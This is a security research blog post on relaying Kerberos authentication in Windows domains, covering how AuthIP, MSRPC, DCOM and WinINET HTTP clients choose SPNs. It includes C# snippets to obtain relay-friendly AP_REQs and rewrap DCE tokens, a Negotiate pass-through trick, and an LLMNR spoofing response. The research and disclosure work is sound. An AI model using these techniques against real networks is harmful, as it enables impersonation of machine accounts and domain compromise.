Authentication relay attacks using the NTLM protocol were first published all the way back in 2001 by Josh Buchbinder (Sir Dystic) of the Cult of the Dead Cow. However, even in 2021 NTLM relay attacks still represent a threat in default configurations of Windows domain networks. The most recent major abuse of NTLM relay was through the Active Directory Certificate Services web enrollment service. This combined with the PetitPotam technique to induce a Domain Controller to perform NTLM authentication allows for a Windows domain to be compromised by an unauthenticated attacker.

Over the years Microsoft has made many efforts to mitigate authentication relay attacks. The best mitigations rely on the fact that the attacker does not have knowledge of the user's password or control over the authentication process. This includes signing and encryption (sealing) of network traffic using a session key which is protected by the user's password or channel binding as part of Extended Protection for Authentication (EPA) which prevents relay of authentication to a network protocol under TLS.

Another mitigation regularly proposed is to disable NTLM authentication either for particular services or network wide using Group Policy. While this has potential compatibility issues, restricting authentication to only Kerberos should be more secure. That got me thinking, is disabling NTLM sufficient to eliminate authentication relay attacks on Windows domains?

Why are there no Kerberos Relay Attacks?

The obvious question is, if NTLM is disabled could you relay Kerberos authentication instead? Searching for Kerberos Relay attacks doesn't yield much public research that I could find. There is the krbrelayx tool written by Dirk-jan which is similar in concept to the ntlmrelayx tool in impacket, a common tool for performing NTLM authentication relay attacks. However as the accompanying blog post makes clear this is a tool to abuse unconstrained delegation rather than relay the authentication.

I did find a recent presentation by Sagi Sheinfeld, Eyal Karni, and Yaron Zinar from Crowdstrike at Defcon 29 (and also coming up at Blackhat EU 2021) which relayed Kerberos authentication. The presentation discussed MitM'ing network traffic to specific servers and then relaying the Kerberos authentication. A MitM attack relies on being able to spoof an existing server through some mechanism, which is a well-known risk. The last line in the presentation is "Microsoft Recommendation: Avoid being MITM'd…" which seems a reasonable approach to take, if possible.

However, a MitM attack is slightly different to the common NTLM relay attack scenario, where you can induce a domain joined system to authenticate to a server an attacker controls and then forward that authentication to an unrelated service. NTLM is easy to relay as it wasn't designed to distinguish authentication to a particular service from any other. The only unique aspect was the server (and later client) challenge, but that value wasn't specific to the service, so authentication for, say, SMB could be forwarded to HTTP and the victim service couldn't tell the difference. Subsequently EPA was retrofitted onto NTLM to make the authentication specific to a service, but due to backwards compatibility these mitigations aren't always used.

On the other hand, Kerberos has always required the target of the authentication to be specified beforehand through a principal name; typically this is a Service Principal Name (SPN), although in certain circumstances it can be a User Principal Name (UPN). The SPN is usually represented as a string of the form CLASS/INSTANCE:PORT/NAME, where CLASS is the class of service, such as HTTP or CIFS, INSTANCE is typically the DNS name of the server hosting the service, and PORT and NAME are optional.

The SPN is used by the Kerberos Ticket Granting Server (TGS) to select the shared encryption key for a Kerberos service ticket generated for the authentication. This ticket contains the details of the authenticating user based on the contents of the Ticket Granting Ticket (TGT) that was requested during the user's initial Kerberos authentication process. The client can then package the service's ticket into an Authentication Protocol Request (AP_REQ) authentication token to send to the server.

Without knowledge of the shared encryption key the Kerberos service ticket can't be decrypted by the service and the authentication fails. Therefore if Kerberos authentication is attempted to an SMB service with the SPN CIFS/fileserver.domain.com, then that ticket shouldn't be usable if the relay target is a HTTP service with the SPN HTTP/fileserver.domain.com, as the shared key should be different.

In practice that's rarely the case in Windows domain networks. The Domain Controller associates the SPN with a user account, most commonly the computer account of the domain joined server and the key is derived from the account's password. The CIFS/fileserver.domain.com and HTTP/fileserver.domain.com SPNs would likely be assigned to the FILESERVER$ computer account, therefore the shared encryption key will be the same for both SPNs and in theory the authentication could be relayed from one service to the other. The receiving service could query for the authenticated SPN string from the authentication APIs and then compare it to its expected value, but this check is typically optional.

The selection of the SPN to use for the Kerberos authentication is typically defined by the target server's host name. In a relay attack the attacker's server will not be the same as the target. For example, the SMB connection might be targeting the attacker's server, and will assign the SPN CIFS/evil.com. Assuming this SPN is even registered it would in all probability have a different shared encryption key to the CIFS/fileserver.domain.com SPN due to the different computer accounts. Therefore relaying the authentication to the target SMB service will fail as the ticket can't be decrypted.

The requirement that the SPN is associated with the target service's shared encryption key is why I assume few consider Kerberos relay attacks to be a major risk, if not impossible. There's an assumption that an attacker cannot induce a client into generating a service ticket for an SPN which differs from the host the client is connecting to.

However, there's nothing inherently stopping Kerberos authentication being relayed if the attacker can control the SPN. The only way to stop relayed Kerberos authentication is for the service to protect itself through the use of signing/sealing or channel binding which rely on the shared knowledge between the client and server, but crucially not the attacker relaying the authentication. However, even now these service protections aren't the default even on critical protocols such as LDAP.

As the only limit on basic Kerberos relay (in the absence of service protections) is the selection of the SPN, this research focuses on how common protocols select the SPN and whether it can be influenced by the attacker to achieve Kerberos authentication relay.

Kerberos Relay Requirements

It's easy to demonstrate in a controlled environment that Kerberos relay is possible. We can write a simple client which uses the Security Support Provider Interface (SSPI) APIs to communicate with the LSA and implement the network authentication. This client calls the InitializeSecurityContext API which will generate an AP_REQ authentication token containing a Kerberos Service Ticket for an arbitrary SPN. This AP_REQ can be forwarded to an intermediate server and then relayed to the service the SPN represents. You'll find this will work, again to reiterate, assuming that no service protections are in place.
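To make that concrete, here's a minimal sketch of such a client in C#. The helper name and the SPN are hypothetical, error handling is omitted, and the point is simply that InitializeSecurityContext will hand back an AP_REQ for whatever SPN we name:

[StructLayout(LayoutKind.Sequential)]
struct SecHandle { public IntPtr dwLower, dwUpper; }

[StructLayout(LayoutKind.Sequential)]
struct SecBuffer
{
    public int cbBuffer;
    public int BufferType; // SECBUFFER_TOKEN = 2
    public IntPtr pvBuffer;
}

[StructLayout(LayoutKind.Sequential)]
struct SecBufferDesc
{
    public int ulVersion; // SECBUFFER_VERSION = 0
    public int cBuffers;
    public IntPtr pBuffers;
}

[DllImport("secur32.dll", CharSet = CharSet.Unicode)]
static extern int AcquireCredentialsHandleW(string principal, string package,
    int credentialUse, IntPtr logonId, IntPtr authData, IntPtr getKeyFn,
    IntPtr getKeyArg, out SecHandle credential, out long expiry);

[DllImport("secur32.dll", CharSet = CharSet.Unicode)]
static extern int InitializeSecurityContextW(ref SecHandle credential,
    IntPtr context, string targetName, int contextReq, int reserved1,
    int targetDataRep, IntPtr input, int reserved2, out SecHandle newContext,
    ref SecBufferDesc output, out int contextAttr, out long expiry);

static byte[] GetApReqForSpn(string spn)
{
    const int SECPKG_CRED_OUTBOUND = 2;
    const int SECURITY_NATIVE_DREP = 0x10;
    AcquireCredentialsHandleW(null, "Kerberos", SECPKG_CRED_OUTBOUND,
        IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero,
        out SecHandle cred, out _);
    // Pre-allocate the output token buffer. No integrity/confidentiality
    // request flags are passed, keeping the AP_REQ relay friendly.
    var buffer = new SecBuffer {
        cbBuffer = 8192, BufferType = 2,
        pvBuffer = Marshal.AllocHGlobal(8192)
    };
    IntPtr pBuffer = Marshal.AllocHGlobal(Marshal.SizeOf<SecBuffer>());
    Marshal.StructureToPtr(buffer, pBuffer, false);
    var desc = new SecBufferDesc { ulVersion = 0, cBuffers = 1, pBuffers = pBuffer };
    InitializeSecurityContextW(ref cred, IntPtr.Zero, spn, 0, 0,
        SECURITY_NATIVE_DREP, IntPtr.Zero, 0, out _, ref desc, out _, out _);
    var result = Marshal.PtrToStructure<SecBuffer>(pBuffer);
    byte[] apReq = new byte[result.cbBuffer];
    Marshal.Copy(result.pvBuffer, apReq, 0, result.cbBuffer);
    return apReq;
}

// Usage: a ticket for a hypothetical file server's SMB service.
// byte[] token = GetApReqForSpn("CIFS/fileserver.domain.com");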

However, there are some caveats in the way a client calls InitializeSecurityContext which will impact how useful the generated AP_REQ is even if the attacker can influence the SPN. If the client specifies any one of the following request flags, ISC_REQ_CONFIDENTIALITY, ISC_REQ_INTEGRITY, ISC_REQ_REPLAY_DETECT or ISC_REQ_SEQUENCE_DETECT then the generated AP_REQ will enable encryption and/or integrity checking. When the AP_REQ is received by the server using the AcceptSecurityContext API it will return a set of flags which indicate if the client enabled encryption or integrity checking. Some services use these returned flags to opportunistically enable service protections.

For example LDAP's default setting is to enable signing/encryption if the client supports it. Therefore you shouldn't be able to relay Kerberos authentication to LDAP if the client enabled any of these protections. However, other services such as HTTP don't typically support signing and sealing and so will happily accept authentication tokens which specify the request flags.

Another caveat is the client could specify channel binding information, typically derived from the certificate used by the TLS channel used in the communication. The channel binding information can be controlled by the attacker, but not set to arbitrary values without a bug in the TLS implementation or the code which determines the channel binding information itself.

While services have an option to only enable channel binding if it's supported by the client, all Windows Kerberos AP_REQ tokens indicate support through the KERB_AP_OPTIONS_CBT options flag in the authenticator. Sagi Sheinfeld et al did demonstrate (see slide 22 in their presentation) that if you can get the AP_REQ from a non-Windows source it will not set the options flag and so no channel binding is enforced, but that was apparently not something Microsoft will fix. It is also possible that a Windows client disables channel binding through a registry configuration option, although that seems to be unlikely in real world networks.

If the client specifies the ISC_REQ_MUTUAL_AUTH request flag when generating the initial AP_REQ it will enable mutual authentication between the client and server. The client expects to receive an Authentication Protocol Response (AP_REP) token from the server after sending the AP_REQ to prove it has possession of the shared encryption key. If the server doesn't return a valid AP_REP the client can assume it's a spoofed server and refuse to continue the communication.

From a relay perspective, mutual authentication doesn't really matter as the server is the target of the relay attack, not the client. The target server will assume the authentication has completed once it's accepted the AP_REQ, so that's all the attacker needs to forward. While the server will generate the AP_REP and return it to the attacker they can just drop it unless they need the relayed client to continue to participate in the communication for some reason.

One final consideration is that the SSPI APIs have two security packages which can be used to implement Kerberos authentication, Negotiate and Kerberos. The Negotiate protocol wraps the AP_REQ (and other authentication tokens) in the SPNEGO protocol whereas Kerberos sends the authentication tokens using a simple GSS-API wrapper (see RFC4121).

The first potential issue is Negotiate is by far the most likely package in use as it allows a network protocol the flexibility to use the most appropriate authentication protocol that the client and server both support. However, what happens if the client uses the raw Kerberos package but the server uses Negotiate?

This isn't a problem as the server implementation of Negotiate will pass the input token to the function NegpDetermineTokenPackage in lsasrv.dll during the first call to AcceptSecurityContext. This function detects if the client has passed a GSS-API Kerberos token (or NTLM) and enables a pass through mode where Negotiate gets out of the way. Therefore even if the client uses the Kerberos package you can still authenticate to the server and keep the client happy without having to extract the inner authentication token or wrap up response tokens.

One actual issue for relaying is the Negotiate protocol enables integrity protection (equivalent to passing ISC_REQ_INTEGRITY to the underlying package) so that it can generate a Message Integrity Code (MIC) for the authentication exchange to prevent tampering. Using the Kerberos package directly won't add integrity protection automatically. Therefore relaying Kerberos AP_REQs from Negotiate will likely hit issues related to automatic enabling of signing on the server. It is possible for a client to explicitly disable automatic integrity checking by passing the ISC_REQ_NO_INTEGRITY request attribute, but that's not a common case.

It's possible to disable Negotiate from the relay if the client passes an arbitrary authentication token to the first call of the InitializeSecurityContext API. On the first call the Negotiate implementation will call the NegpDetermineTokenPackage function to determine whether to enable authentication pass through. If the initial token is NTLM or looks like a Kerberos token then it'll pass through directly to the underlying security package and it won't set ISC_REQ_INTEGRITY, unless the client explicitly requested it. The byte sequence [0x00, 0x01, 0x40] is sufficient to get Negotiate to detect Kerberos, and the token is then discarded so it doesn't have to contain any further valid data.
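For example, something like the following (reusing the same SecBufferDesc plumbing shown in the earlier sketch) would push Negotiate into Kerberos pass-through mode; the stub token is discarded after detection so its content doesn't matter:

// A 3 byte stub is sufficient for NegpDetermineTokenPackage to classify
// the input as a Kerberos token.
byte[] fakeKerberosToken = new byte[] { 0x00, 0x01, 0x40 };
// Supply this as the SECBUFFER_TOKEN input buffer of the FIRST call to
// InitializeSecurityContext for the Negotiate package. The runtime then
// enables Kerberos pass-through without adding ISC_REQ_INTEGRITY.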

Sniffing and Proxying Traffic

Before going into individual protocols that I've researched, it's worth discussing some more obvious ways of getting access to Kerberos authentication targeted at other services. First is sniffing network traffic sent from client to the server. For example, if the Kerberos AP_REQ is sent to a service over an unencrypted network protocol and the attacker can view that traffic the AP_REQ could be extracted and relayed. The selection of the SPN will be based on the expected traffic so the attacker doesn't need to do anything to influence it.

The Kerberos authentication protocol has protections against this attack vector. The Kerberos AP_REQ doesn't just contain the service ticket, it's also accompanied by an Authenticator which is encrypted using the ticket's session key. This key is accessible by both the legitimate client and the service. The authenticator contains a timestamp of when it was generated, and the service can check if this authenticator is within an allowable time range and whether it has seen the timestamp already. This allows the service to reject replayed authenticators by caching recently received values, and the allowable time window prevents the attacker waiting for any cache to expire before replaying.

What this means is that while an attacker could sniff the Kerberos authentication on the wire and relay it, if the service has already received the authenticator it would be rejected as being a replay. The only way to exploit it would be to somehow prevent the legitimate authentication request from reaching the service, or race the request so that the attacker's packet is processed first.

Note, RFC4120 mentions the possibility of embedding the client's network address in the authenticator so that the service could reject authentication coming from the wrong host. This isn't used by the Windows Kerberos implementation as far as I can tell. No doubt it would cause too many false positives for the replay protection in anything but the simplest enterprise networks.

Therefore the only reliable way to exploit this scenario would be to actively interpose on the network communications between the client and service. This is of course practical and has been demonstrated many times assuming the traffic isn't protected using something like TLS with server verification. Various attacks would be possible such as ARP or DNS spoofing attacks or HTTP proxy redirection to perform the interposition of the traffic.

However, active MitM of protocols is a known risk and therefore an enterprise might have technical defenses in place to mitigate the issue. Of course, if such enterprises have enabled all the recommended relay protections, it's a moot point. Regardless, we'll assume that MitM is impractical for existing services due to protections in place and consider how individual protocols handle SPN selection.

IPSec and AuthIP

My research into Kerberos authentication relay came about in part because I was looking into the implementation of IPSec on Windows as part of my firewall research. Specifically I was researching the AuthIP ISAKMP which allows for Windows authentication protocols to be used to establish IPsec Security Associations.

I noticed that the AuthIP protocol has a GSS-ID payload which can be sent from the server to the client. This payload contains the textual SPN to use for the Kerberos authentication during the AuthIP process. This SPN is passed verbatim to the SSPI InitializeSecurityContext call by the AuthIP client.

As no verification is done on the format of the SPN in the GSS-ID payload, it allows the attacker to fully control the values including the service class and instance name. Therefore if an attacker can induce a domain joined machine to connect to an attacker controlled service and negotiate AuthIP then a Kerberos AP_REQ for an arbitrary SPN can be captured for relay use. As this AP_REQ is never sent to the target of the SPN it will not be detected as a replay.

Inducing authentication isn't necessarily difficult. Any IP traffic which is covered by the domain configured security connection rules will attempt to perform AuthIP. For example it's possible that a UDP response for a DNS request from the domain controller might be sufficient. AuthIP supports two authenticated users, the machine and the calling user. By default it seems the machine authenticates first, so if you convinced a Domain Controller to authenticate you'd get the DC computer account which could be fairly exploitable.

For interest's sake, the SPN is also used to determine the computer account associated with the server. This computer account is then used with Service For User (S4U) to generate a local access token allowing the client to determine the identity of the server. However I don't think this is that useful as the fake server can't complete the authentication and the connection will be discarded.

The security connection rules use IP address ranges to determine what hosts need IPsec authentication. If these address ranges are too broad it's also possible that ISAKMP AuthIP traffic might leak to external networks. For example if the rules don't limit the network ranges to the enterprise's addresses, then even a connection out to a public service could be accompanied by the ISAKMP AuthIP packet. This can be then exploited by an attacker who is not co-located on the enterprise network just by getting a client to connect to their server, such as through a web URL.

Diagram of a relay using a fake AuthIP server

To summarize the attack process from the diagram:

  1. Induce a client computer to send some network traffic to EVILHOST. It doesn't really matter what the traffic is, only that the IP address, type and port must match an IP security connection rule to use AuthIP. EVILHOST does not need to be domain joined to perform the attack.
  2. The network traffic will get the Windows IPsec client to try and establish a security association with the target host.
  3. A fake AuthIP server on the target host receives the request to establish a security association and returns a GSS-ID payload. This payload contains the target SPN, for example CIFS/FILESERVER.
  4. The IPsec client uses the SPN to create an AP_REQ token and sends it to EVILHOST.
  5. EVILHOST relays the Kerberos AP_REQ to the target service on FILESERVER.

Relaying this AuthIP authentication isn't ideal from an attacker's perspective. As the authentication will be used to sign and seal the network traffic, the request context flags for the call to InitializeSecurityContext will require integrity and confidentiality protection. For network protocols such as LDAP which default to requiring signing and sealing if the client supports it, this would prevent the relay attack from working. However if the service ignores the protection and doesn't have any further checks in place this would be sufficient.

This issue was reported to MSRC and assigned case number 66900. However Microsoft have indicated that it will not be fixed with a security bulletin. I've described Microsoft's rationale for not fixing this issue later in the blog post. If you want to reproduce this issue there's details on Project Zero's issue tracker.

MSRPC

After discovering that AuthIP could allow for authentication relay the next protocol I looked at is MSRPC. The protocol supports NTLM, Kerberos or Negotiate authentication protocols over connected network transports such as named pipes or TCP. These authentication protocols need to be opted into by the server using the RpcServerRegisterAuthInfo API by specifying the authentication service constants of RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_KERBEROS or RPC_C_AUTHN_GSS_NEGOTIATE respectively. When registering the authentication information the server can optionally specify the SPN that needs to be used by the client.

However, this SPN isn't actually used by the RPC server itself. Instead it's registered with the runtime, and a client can query the server's SPN using the RpcMgmtInqServerPrincName management API. Once the SPN is queried the client can configure its authentication for the connection using the RpcBindingSetAuthInfo API. However, this isn't required; the client could just generate the SPN manually and set it. If the client doesn't call RpcBindingSetAuthInfo then it will not perform any authentication on the RPC connection.

As an aside, when a connection is made to the server it can, curiously, query the client's authentication information using the RpcBindingInqAuthClient API. However, the SPN that this API returns is the one registered by RpcServerRegisterAuthInfo and NOT the one which was used by the client to authenticate. Also Microsoft does mention the call to RpcMgmtInqServerPrincName in the "Writing a secure RPC client or server" section on MSDN. However, they frame it in the context of mutual authentication and not protection against a relay attack.

If a client queries for the SPN from a malicious RPC server it will authenticate using a Kerberos AP_REQ for an SPN fully under the attacker's control. Whether the AP_REQ has integrity or confidentiality enabled depends on the authentication level set during the call to RpcBindingSetAuthInfo. If this is set to RPC_C_AUTHN_LEVEL_CONNECT and the client uses RPC_C_AUTHN_GSS_KERBEROS then the AP_REQ won't have integrity enabled. However, if Negotiate is used or anything above RPC_C_AUTHN_LEVEL_CONNECT as a level is used then it will have the integrity/confidentiality flags set.

Doing a quick scan in system32 the following DLLs call the RpcMgmtInqServerPrincName API: certcli.dll, dot3api.dll, dusmsvc.dll, FrameServerClient.dll, L2SecHC.dll, luiapi.dll, msdtcprx.dll, nlaapi.dll, ntfrsapi.dll, w32time.dll, WcnApi.dll, WcnEapAuthProxy.dll, WcnEapPeerProxy.dll, witnesswmiv2provider.dll, wlanapi.dll, wlanext.exe, WLanHC.dll, wlanmsm.dll, wlansvc.dll, wwansvc.dll, wwapi.dll. Some basic analysis shows that none of these clients check the value of the SPN and use it verbatim with RpcBindingSetAuthInfo. That said, they all seem to use RPC_C_AUTHN_GSS_NEGOTIATE and set the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY which makes them less useful as an attack vector.

If the client specifies RPC_C_AUTHN_GSS_NEGOTIATE but does not specify an SPN then the runtime generates one automatically, based on the target hostname with the RestrictedKrbHost service class. The runtime doesn't process the hostname; it just concatenates strings, and for some reason it doesn't support generating the SPN for RPC_C_AUTHN_GSS_KERBEROS.
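In effect the automatic SPN generation amounts to nothing more than the following sketch (my paraphrase of the observed behavior):

// No canonicalization or DNS lookups, just string concatenation.
static string GetDefaultRpcSpn(string hostname)
{
    return "RestrictedKrbHost/" + hostname;
}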

One additional quirk of the RPC runtime is that the request attribute flag ISC_REQ_USE_DCE_STYLE is used when calling InitializeSecurityContext. This enables a special three-leg authentication mode which results in the server sending back an AP_REP and then receiving another AP_REP from the client. Until that third AP_REP has been provided to the server it won't consider the authentication complete, so it's not sufficient to just forward the initial AP_REQ token and close the connection to the client. This just makes the relay code slightly more complex, but not impossible.

A second change that ISC_REQ_USE_DCE_STYLE introduces is that the Kerberos AP_REQ token does not have a GSS-API wrapper. This causes the call to NegpDetermineTokenPackage to fail to detect the package in use, making it impossible to directly forward the traffic to a server using the Negotiate package. However, this prefix is not protected against modification, so the relay code can prepend the appropriate value before forwarding to the server. For example the following C# code can be used to convert a DCE style AP_REQ to a GSS-API format which Negotiate will accept.

public static byte[] EncodeLength(int length)
{
    if (length < 0x80)
        return new byte[] { (byte)length };
    if (length < 0x100)
        return new byte[] { 0x81, (byte)length };
    if (length < 0x10000)
        return new byte[] { 0x82, (byte)(length >> 8),
                            (byte)(length & 0xFF) };
    throw new ArgumentException("Invalid length", nameof(length));
}

public static byte[] ConvertApReq(byte[] token)
{
    if (token.Length == 0 || token[0] != 0x6E)
        return token;
    MemoryStream stm = new MemoryStream();
    BinaryWriter writer = new BinaryWriter(stm);
    Console.WriteLine("Converting DCE AP_REQ to GSS-API format.");
    byte[] header = new byte[] { 0x06, 0x09, 0x2a, 0x86, 0x48,
       0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x01, 0x00 };
    writer.Write((byte)0x60);
    writer.Write(EncodeLength(header.Length + token.Length));
    writer.Write(header);
    writer.Write(token);
    return stm.ToArray();
}

Subsequent tokens in the authentication process don't need to be wrapped; in fact, wrapping them with their GSS-API headers will cause the authentication to fail. Relaying MSRPC requests would probably be difficult just due to the relative lack of clients which request the server's SPN. Also when the SPN is requested it tends to be a conscious act of securing the client and so best practice tends to require the developer to set the maximum authentication level, making the Kerberos AP_REQ less useful.

DCOM

The DCOM protocol uses MSRPC under the hood to access remote COM objects, therefore it should have the same behavior as MSRPC. The big difference is DCOM is designed to automatically handle the authentication requirements of a remote COM object through binding information contained in the DUALSTRINGARRAY returned during Object Exporter ID (OXID) resolving. Therefore the client doesn't need to explicitly call RpcBindingSetAuthInfo to configure the authentication.

The binding information contains the protocol sequence and endpoint to use (such as TCP on port 30000) as well as the security bindings. Each security binding contains the RPC authentication service (wAuthnSvc in the below screenshot) to use as well as an optional SPN (aPrincName) for the authentication. Therefore a malicious DCOM server can force the client to use the RPC_C_AUTHN_GSS_KERBEROS authentication service with a completely arbitrary SPN by returning an appropriate security binding.

Screenshot of part of the MS-DCOM protocol documentation showing the SECURITYBINDING structure

The authentication level chosen by the client depends on the value of the dwAuthnLevel parameter specified if the COM client calls the CoInitializeSecurity API. If the client doesn't explicitly call CoInitializeSecurity then a default will be used, which is currently RPC_C_AUTHN_LEVEL_CONNECT. This means neither integrity nor confidentiality will be enforced on the Kerberos AP_REQ by default.

One limitation is that without a call to CoInitializeSecurity, the default impersonation level for the client is set to RPC_C_IMP_LEVEL_IDENTIFY. This means the access token generated by the DCOM RPC authentication can only be used for identification and not for impersonation. For some services this isn't an issue, for example LDAP doesn't need an impersonation level token. However for others such as SMB this would prevent access to files. It's possible that you could find a COM client which sets both RPC_C_AUTHN_LEVEL_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE though there's no trivial process to assess that.

Getting a client to connect to the server isn't trivial as DCOM isn't a widely used protocol on modern Windows networks due to high authentication requirements. However, one use case for this is local privilege escalation. For example you could get a privileged service to connect to the malicious COM server and relay the computer account Kerberos AP_REQ which is generated. I have a working PoC for this which allows a local non-admin user to connect to the domain's LDAP server using the local computer's credentials.

This attack is somewhat similar to the RemotePotato attack (which uses NTLM rather than Kerberos) which again Microsoft have refused to fix. I'll describe this in more detail in a separate blog post after this one.

HTTP

HTTP has supported NTLM and Negotiate authentication for a long time (see this draft from 2002, although the most recent RFC is 4559 from 2006). To initiate a Windows authentication session the server can respond to a request with the status code 401 and specify a WWW-Authenticate header with the value Negotiate. If the client supports Windows authentication it can use InitializeSecurityContext to generate a token, convert the binary token into a Base64 string, and send it in the next request to the server with the Authorization header. This process is repeated until the client errors or the authentication succeeds.
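For reference, the exchange on the wire looks something like the following, with client (C) and server (S) lines interleaved; the Negotiate token is a Base64 string, truncated here for brevity:

C: GET /resource HTTP/1.1
C: Host: server

S: HTTP/1.1 401 Unauthorized
S: WWW-Authenticate: Negotiate

C: GET /resource HTTP/1.1
C: Host: server
C: Authorization: Negotiate YIIHVwYGKwYBBQUCoII...

S: HTTP/1.1 200 OK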

In theory only NTLM and Negotiate are defined, but an HTTP implementation could use other Windows authentication packages such as Kerberos if it so chose. Whether the HTTP client will automatically use the user's credentials is up to the user agent or the developer using it as a library.

All the major browsers support both authentication types as well as many non browser HTTP user agents such as those in .NET and WinHTTP. I looked at the following implementations, all running on Windows 10 21H1:

  • WinINET (Internet Explorer 11)
  • WinHTTP (WebClient)
  • Chromium M93 (Chrome and Edge)
  • Firefox 91
  • .NET Framework 4.8
  • .NET 5.0 and 6.0

This is of course not an exhaustive list, and there's likely to be many different HTTP clients in Windows which might have different behaviors. I've also not looked at how non-Windows clients work in this regard.

There are two important behaviors that I wanted to assess with HTTP. First, how the user agent determines when to perform automatic Windows authentication using the current user's credentials; in order to relay the authentication it can't ask the user for their credentials. Second, how the SPN is selected by the user agent when calling InitializeSecurityContext.

WinINET (Internet Explorer 11)

WinINET can be used as a generic library to handle HTTP connections and authentication. There's likely many different users of WinINET but we'll just look at Internet Explorer 11 as that is what it's most known for. WinINET is also the originator of HTTP Negotiate authentication, so it's good to get a baseline of what WinINET does in case other libraries just copied its behavior.

First, how does WinINET determine when it should handle Windows authentication automatically? By default this is based on whether the target host is considered to be in the Intranet Zone. This means any host which bypasses the configured HTTP proxy or uses an undotted name will be considered Intranet zone and WinINET will automatically authenticate using the current user's credentials.

It's possible to disable this behavior by changing the security options for the Intranet Zone to "Prompt for user name and password", as shown below:

Screenshot of the system Internet Options Security Settings showing how to disable automatic authentication

Next, how does WinINET determine the SPN to use for Negotiate authentication? RFC4559 says the following:

'When the Kerberos Version 5 GSSAPI mechanism [RFC4121] is being used, the HTTP server will be using a principal name of the form of "HTTP/hostname"'

You might assume therefore that the HTTP URL that WinINET is connecting to would be sufficient to build the SPN: just use the hostname as provided and combine it with the HTTP service class. However it turns out that's not entirely the case. I found a rough description of how IE and WinINET actually generate the SPN in this blog. That post is over 10 years old, so things could have changed, but it turns out they haven't.

The basic approach is that WinINET doesn't necessarily trust the hostname specified in the HTTP URL. Instead it requests the canonical name of the server via DNS. It doesn't seem to explicitly request a CNAME record from the DNS server. Instead it calls getaddrinfo and specifies the AI_CANONNAME hint. Then it uses the returned value of ai_canonname and prefixes it with the HTTP service class. In general ai_canonname is the name provided by the DNS server in the returned A/AAAA record.

For example, if the HTTP URL is http://fileserver.domain.com, but the DNS A record contains the canonical name example.domain.com the generated SPN is HTTP/example.domain.com and not HTTP/fileserver.domain.com. Therefore to provide an arbitrary SPN you need to get the name in the DNS address record to differ from the IP address in that record so that IE will connect to a server we control while generating Kerberos authentication for a different target name.
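You can observe the same canonical-name behavior from .NET, which performs a rough equivalent of the getaddrinfo lookup (the hostnames here are the hypothetical ones from the example above):

// Dns.GetHostEntry resolves the address record and populates HostName
// with the canonical name, which WinINET prefixes with the service class.
var entry = System.Net.Dns.GetHostEntry("fileserver.domain.com");
string spn = "HTTP/" + entry.HostName;
Console.WriteLine(spn); // prints HTTP/example.domain.com in the example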

The most obvious technique would be to specify a DNS CNAME record which redirects to another hostname. However, at least if the client is using a Microsoft DNS server (which is likely for a domain environment) then the CNAME record is not directly returned to the client. Instead the DNS server will perform a recursive lookup, and then return the CNAME along with the validated address record to the client.

Therefore, if an attacker sets up a CNAME record for www.evil.com which redirects to fileserver.domain.com, the DNS server will return the CNAME record and an address record for the real IP address of fileserver.domain.com. WinINET will then try to connect to the HTTP service on fileserver.domain.com rather than www.evil.com, even though connecting to the attacker's server is what is needed for the attack to function.

I tried various ways of tricking the DNS client into making a direct request to a DNS server I controlled but I couldn't seem to get it to work. However, it turns out there is a way to get the DNS resolver to accept arbitrary DNS responses, via local DNS resolution protocols such as Multicast DNS (MDNS) and Link-Local Multicast Name Resolution (LLMNR).

These two protocols use a lightly modified DNS packet structure, so you can return a response to the name resolution request with an address record with the IP address of the malicious web server, but the canonical name of any server. WinINET will then make the HTTP connection to the malicious web server but construct the SPN for the spoofed canonical name. I've verified this with LLMNR and in theory MDNS should work as well.

Is spoofing the canonical name a bug in the Windows DNS client resolver? I don't believe any DNS protocol requires the query name to exactly match the answer name. If the DNS server has a CNAME record for the queried host then there's no obvious requirement for it to return that record when it could just return the address record. Of course if a public DNS server could spoof a host for a DNS zone which it didn't control, that'd be a serious security issue. It's also worth noting that this doesn't spoof the name generally. As the cached DNS entry on Windows is based on the query name, if the client now resolves fileserver.domain.com a new DNS request will be made and the DNS server would return the real address.

Attacking local name resolution protocols is a well-known weakness abused for MitM attacks, so it's likely that some security conscious networks will disable the protocols. However, the advantage of using LLMNR this way over its use for MitM is that the resolved name can be anything. Normally you'd want to spoof the DNS name of an existing host; in our example you'd spoof the request for the fileserver name. But for registered computers on the network the DNS client will usually satisfy the name resolution via the network's DNS server before ever trying local DNS resolution, so local DNS resolution would never be triggered and it wouldn't be possible to spoof it. For relaying Kerberos authentication we don't care: we can induce a client to connect to an unregistered host name, which will fall back to local DNS resolution.

The big problem with the local DNS resolution attack vector is that the attacker must be in the same multicast domain as the victim computer. However, the attacker can still start the process by getting a user to connect to an external domain which looks legitimate then redirect to an undotted name to both force automatic authentication and local DNS resolving.

Diagram of the local DNS resolving attack against WinINET

To summarize the attack process as shown in the above diagram:

  1. The attacker sets up an LLMNR service on a machine in the same multicast domain at the victim computer. The attacker listens for a target name request such as EVILHOST.
  2. Trick the victim to use IE (or another WinINET client, such as via a document format like DOCX) to connect to the attacker's server on http://EVILHOST.
  3. The LLMNR server receives the lookup request and responds by setting the address record's hostname to the SPN target host to spoof and the IP address to the attacker-controlled server.
  4. The WinINET client extracts the spoofed canonical name, appends the HTTP service class to the SPN and requests the Kerberos service ticket. This Kerberos ticket is then sent to the attacker's HTTP service.
  5. The attacker receives the Negotiate/Kerberos authentication for the spoofed SPN and relays it to the real target server.

An example LLMNR response decoded by Wireshark for the name evilhost (with IP address 10.0.0.80), spoofing fileserver.domain.com (which is not address 10.0.0.80) is shown below:

Link-local Multicast Name Resolution (response)
    Transaction ID: 0x910f
    Flags: 0x8000 Standard query response, No error
    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0
    Queries
        evilhost: type A, class IN
            Name: evilhost
            [Name Length: 8]
            [Label Count: 1]
            Type: A (Host Address) (1)
            Class: IN (0x0001)
    Answers
        fileserver.domain.com: type A, class IN, addr 10.0.0.80
            Name: fileserver.domain.com
            Type: A (Host Address) (1)
            Class: IN (0x0001)
            Time to live: 1 (1 second)
            Data length: 4
            Address: 10.0.0.80

